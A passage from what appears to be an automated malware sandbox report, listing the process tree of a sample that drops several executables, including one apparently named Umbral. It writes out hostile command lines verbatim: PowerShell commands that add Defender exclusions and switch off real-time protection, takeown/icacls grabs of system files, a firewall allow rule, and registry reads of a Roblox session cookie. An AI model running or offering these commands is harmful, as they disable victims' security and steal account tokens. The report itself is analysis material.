                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:6788
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\the.exe" -Force
                                                                                                                            5⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3316
                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                                                            5⤵
                                                                                                                              PID:6604
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                                                              5⤵
                                                                                                                                PID:1256
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 164
                                                                                                                                  6⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:1304
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                                                                                                                5⤵
                                                                                                                                  PID:3344
                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                              taskkill /f /im taskmgr.exe
                                                                                                                              3⤵
                                                                                                                              • Kills process with taskkill
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:6548
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\wimloader.dll
                                                                                                                              wimloader.dll
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:1388
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_1be6265f-e772-4426-bba0-260690167925\caller.cmd" "
                                                                                                                                4⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4824
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\ac3.exe
                                                                                                                              ac3.exe
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:6564
                                                                                                                            • C:\Windows\SysWOW64\notepad.exe
                                                                                                                              "C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\shell1.ps1"
                                                                                                                              3⤵
                                                                                                                                PID:2712
                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                ping trustsentry.com -t -n 1 -s 4 -4
                                                                                                                                3⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                • Runs ping.exe
                                                                                                                                PID:4412
                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                ping ya.ru -t -n 1 -s 4 -4
                                                                                                                                3⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                • Runs ping.exe
                                                                                                                                PID:6080
                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                ping tria.ge -t -n 1 -s 4 -4
                                                                                                                                3⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                • Runs ping.exe
                                                                                                                                PID:6524
                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                xcopy bloatware C:\Users\Admin\Desktop
                                                                                                                                3⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:5784
                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                xcopy beastify.url C:\Users\Admin\Desktop
                                                                                                                                3⤵
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:5416
                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                xcopy shell1.ps1 C:\Users\Admin\Desktop
                                                                                                                                3⤵
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:7120
                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                takeown /R /F C:\Windows\explorer.exe
                                                                                                                                3⤵
                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:1388
                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                icacls c:\Windows\explorer.exe /grant Admin:(F)
                                                                                                                                3⤵
                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                • Modifies file permissions
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:2932
                                                                                                                              • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                takeown /R /F C:\Windows\System32\dwm.exe
                                                                                                                                3⤵
                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                • Modifies file permissions
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:1860
                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
                                                                                                                                3⤵
                                                                                                                                • Possible privilege escalation attempt
                                                                                                                                • Modifies file permissions
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:6252
                                                                                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                xcopy xcer.cer C:\Users\Admin\Desktop
                                                                                                                                3⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:4956
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /t 15
                                                                                                                                3⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:4920
                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                timeout /t 15
                                                                                                                                3⤵
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                PID:4108
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\freebobux.exe
                                                                                                                                freebobux.exe
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                PID:4932
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\48F6.tmp\freebobux.bat""
                                                                                                                                  4⤵
                                                                                                                                    PID:5544
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\SolaraBootstraper.exe
                                                                                                                                  SolaraBootstraper.exe
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:6336
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:2424
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Drops file in Drivers directory
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:6104
                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                      "wmic.exe" csproduct get uuid
                                                                                                                                      5⤵
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:6296
                                                                                                                                    • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                                                                                      5⤵
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:5096
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:768
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:6008
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:6444
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                      5⤵
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:4608
                                                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                      "wmic.exe" os get Caption
                                                                                                                                      5⤵
                                                                                                                                        PID:3552
                                                                                                                                      • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                        "wmic.exe" computersystem get totalphysicalmemory
                                                                                                                                        5⤵
                                                                                                                                          PID:5400
                                                                                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                          "wmic.exe" csproduct get uuid
                                                                                                                                          5⤵
                                                                                                                                            PID:5580
                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                            5⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:5236
                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                            "wmic" path win32_VideoController get name
                                                                                                                                            5⤵
                                                                                                                                            • Detects videocard installed
                                                                                                                                            PID:5508
                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
                                                                                                                                            5⤵
                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                            PID:6656
                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                              ping localhost
                                                                                                                                              6⤵
                                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                              • Runs ping.exe
                                                                                                                                              PID:5512
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
                                                                                                                                          4⤵
                                                                                                                                          • Drops startup file
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                          PID:6904
                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                            netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
                                                                                                                                            5⤵
                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                            PID:6828
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /f /im ctfmon.exe
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:6736
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\wim.dll
                                                                                                                                        wim.dll
                                                                                                                                        3⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:5524
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_b2703cb1-6783-46d2-a0f5-cf9b9eb4b072\load.cmd" "
                                                                                                                                          4⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:3864
                                                                                                                                          • C:\Program Files\VideoLAN\VLC\vlc.exe
                                                                                                                                            "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_b2703cb1-6783-46d2-a0f5-cf9b9eb4b072\cringe.mp4"
                                                                                                                                            5⤵
                                                                                                                                            • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:5160
                                                                                                                                          • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                                                                                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_b2703cb1-6783-46d2-a0f5-cf9b9eb4b072\lol.ini
                                                                                                                                            5⤵
                                                                                                                                              PID:4420
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\web2.htm
                                                                                                                                          3⤵
                                                                                                                                          • Enumerates system info in registry
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          PID:6672
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a4718
                                                                                                                                            4⤵
                                                                                                                                              PID:5196
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
                                                                                                                                              4⤵
                                                                                                                                                PID:4084
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
                                                                                                                                                4⤵
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:1416
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
                                                                                                                                                4⤵
                                                                                                                                                  PID:5772
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2520
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
                                                                                                                                                    4⤵
                                                                                                                                                      PID:1860
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1
                                                                                                                                                      4⤵
                                                                                                                                                        PID:5336
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
                                                                                                                                                        4⤵
                                                                                                                                                          PID:5996
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5804 /prefetch:8
                                                                                                                                                          4⤵
                                                                                                                                                            PID:3600
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5804 /prefetch:8
                                                                                                                                                            4⤵
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:5608
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5524
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5192
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:7152
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,2297222287293609363,17231921330959615974,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:3440
                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                  "C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\xcer.cer
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                  PID:5884
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                                                                                                                  f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:6740
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                    PID:6532
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc435a46f8,0x7ffc435a4708,0x7ffc435a4718
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:6836
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:6244
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
                                                                                                                                                                          5⤵
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:6012
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
                                                                                                                                                                          5⤵
                                                                                                                                                                            PID:3144
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
                                                                                                                                                                            5⤵
                                                                                                                                                                              PID:2952
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:1
                                                                                                                                                                              5⤵
                                                                                                                                                                                PID:792
                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8787212124250563748,16392930242392876371,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5536
                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
